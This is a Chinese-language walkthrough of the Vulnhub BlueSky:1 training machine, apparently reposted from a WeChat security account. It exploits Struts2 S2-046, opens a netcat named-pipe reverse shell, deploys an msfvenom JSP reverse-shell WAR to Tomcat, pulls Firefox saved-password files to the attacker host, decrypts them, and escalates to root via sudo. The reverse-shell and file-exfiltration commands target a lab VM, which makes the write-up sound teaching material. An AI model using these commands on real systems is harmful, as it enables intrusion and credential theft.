Vulnhub-BlueSky-1

admin
admin
admin
138438
文章
113
评论
2024年8月5日22:53:03评论21 views字数 2819阅读9分23秒阅读模式
免责声明
由于传播、利用本公众号狐狸说安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号狐狸说安全及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉,谢谢!

0x01 靶机介绍

  • Name: BlueSky: 1

  • Date release: 10 Dec 2020

  • Author: SunCSR Team

  • Series: BlueSky

  • Difficulty: Easy

  • Goal: Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root).

靶机下载地址:

https://www.vulnhub.com/entry/bluesky-1,623/

0x02 侦察

端口探测
首先使用 nmap 进行端口扫描
nmap -p- -sV -sC -A 192.168.0.106 -oA nmap_bluesky

Vulnhub-BlueSky-1

扫描结果显示目标开放了22和80端口。
80端口
访问http://192.168.0.106为 Tomcat 管理界面

Vulnhub-BlueSky-1

目录扫描
使用 gobuster 进行目录扫描,成功发现默认目录docs、examples、manager
gobuster dir -u http://192.168.0.106:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

Vulnhub-BlueSky-1

0x03上线[minhtuan]

信息收集
使用 searchsploit 查找当前 Tomcat 版本的已知漏洞
searchsploit tomcat 9.0

Vulnhub-BlueSky-1

尝试弱口令进行登录,但均无法成功

Vulnhub-BlueSky-1

Struts2 RCE
漏洞检测
在查询相关资料后找到 Struts2 框架路径
http://192.168.0.106:8080/struts2-showcase/showcase.action,使用扫描工具进行漏洞扫描,成功找到 S2-045、S2-046、S2-048 漏洞 工具地址:
https://github.com/Lucifer1993/struts-scan
python struts-scan.py http://192.168.0.106:8080/struts2-showcase/showcase.action

Vulnhub-BlueSky-1

利用 S2-046 成功拿到shell

python struts-scan.py -u http://192.168.0.106:8080/struts2-showcase/showcase.action -i struts2-046

Vulnhub-BlueSky-1

当然也可以使用其他工具进行漏洞利用

git clone https://github.com/mazen160/struts-pwn.git

Vulnhub-BlueSky-1

利用工具发现漏洞并成功执行命令

python struts-pwn.py --url "http://192.168.0.106:8080/struts2-showcase/showcase.action"

Vulnhub-BlueSky-1

反弹shell
验证目标主机 nc 是否存在,结果显示存在 nc 但无-e参数权限
python struts-pwn.py --url "http://192.168.0.106:8080/struts2-showcase/showcase.action" -c "nc"python struts-pwn.py --url "http://192.168.0.106:8080/struts2-showcase/showcase.action" -c "nc -e"

Vulnhub-BlueSky-1

在/tmp目录下创建管道mac,利用管道进行重定向

mknod /tmp/mac p python struts-pwn.py --url "http://192.168.0.106:8080/struts2-showcase/showcase.action" -c "mknod /tmp/mac p"

Vulnhub-BlueSky-1

本地监听8888端口

nc -nvlp 8888

通过管道文件mac进行数据重定向传递

python struts-pwn.py --url "http://192.168.0.106:8080/struts2-showcase/showcase.action" -c "/bin/sh 0</tmp/mac | nc 192.168.0.109 8888 1>/tmp/mac"

Vulnhub-BlueSky-1

成功拿到反弹shell

python3 -c "import pty;pty.spawn('/bin/bash')"

Vulnhub-BlueSky-1

在当前用户家目录下成功找到第一个flag

cat user.txt

Vulnhub-BlueSky-1

在服务器上进行信息收集发现 Tomcat 后台登录密码为6mzf3>gfZ.pN8_Mp

cd /usr/local/tomcat ##默认安装路径cat /conf/tomcat-users.xml

Vulnhub-BlueSky-1

Tomcat部署war包
使用账号密码admin/6mzf3>gfZ.pN8_Mp进入管理后台

Vulnhub-BlueSky-1

通过 MSF 生成用于反弹shell的 war 包

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.0.109 LPORT=5555 -f war -o shell.war

Vulnhub-BlueSky-1

在后台中部署 war 包

Vulnhub-BlueSky-1

在本地监听5555端口

nc -nvlp 5555

访问木马地址http://192.168.0.106:8080/shell/成功拿到shell

Vulnhub-BlueSky-1

0x04权限提升【ROOT】

信息收集
在用户目录下面发现 Mozilla Firefox,一般而言 Firefox 浏览器中保有密码记录,不同版本的 Firefox 浏览器保存密码文件不同,在版本大于或等于32.0密码会存于logins.json,而在版本大于3.5且小于32.0的情况下密码会存于signons.sqlite
ls -la

Vulnhub-BlueSky-1

进入 Firefox 目录成功发现logins.json和key4.db

cd .mozilla/firefox/fvbljmev.default-release

Vulnhub-BlueSky-1

在靶机中通过 python 开启 http 服务

python3 -m http.server 7777

在本地请求两个文件

wget http://192.168.0.106:7777/logins.jsonwget http://192.168.0.106:7777/key4.db

Vulnhub-BlueSky-1

下载解密脚本并破解

git clone https://github.com/lclevy/firepwdpip3 install -r requirements.txtcd firepwdpython3 firepwd.py -d ../

Vulnhub-BlueSky-1

成功拿到账号密码minhtuan/skysayohyeah

Vulnhub-BlueSky-1

通过 SSH 成功登录 mintuan 用户

ssh minhtuan@192.168.0.106

查看 sudo 权限为ALL

sudo -l
sudo提权
利用 sudo 配合已知密码成功拿到第二个flag
sudo sucd ~cat root.txt

Vulnhub-BlueSky-1

0x05 知识星球

Vulnhub-BlueSky-1

原文始发于微信公众号(狐狸说安全):Vulnhub-BlueSky-1

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月5日22:53:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulnhub-BlueSky-1https://cn-sec.com/archives/2029028.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息